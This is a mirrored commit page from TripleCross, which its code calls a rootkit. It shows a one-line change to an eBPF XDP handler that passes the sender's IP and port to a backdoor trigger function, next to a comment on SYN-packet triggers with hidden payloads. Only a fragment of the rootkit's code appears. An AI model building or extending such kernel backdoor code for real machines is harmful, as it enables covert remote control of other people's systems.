mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-28 12:23:06 +08:00
Completed the TC Hook and payload enlargment and substitution mechanisms. Only the packet recognition on the client side remains to work
This commit is contained in:
@@ -104,7 +104,7 @@ int xdp_receive(struct xdp_md *ctx){
|
||||
bpf_printk("G");
|
||||
return XDP_PASS;
|
||||
}
|
||||
return manage_backdoor_trigger_v1(payload, payload_size);
|
||||
return manage_backdoor_trigger_v1(payload, payload_size, ip->saddr, tcp->source);
|
||||
}
|
||||
//Check for rootkit backdoor trigger V3 - stream of SYN packets with hidden payload
|
||||
if(tcp->syn == 1){
|
||||
|
||||
Reference in New Issue
Block a user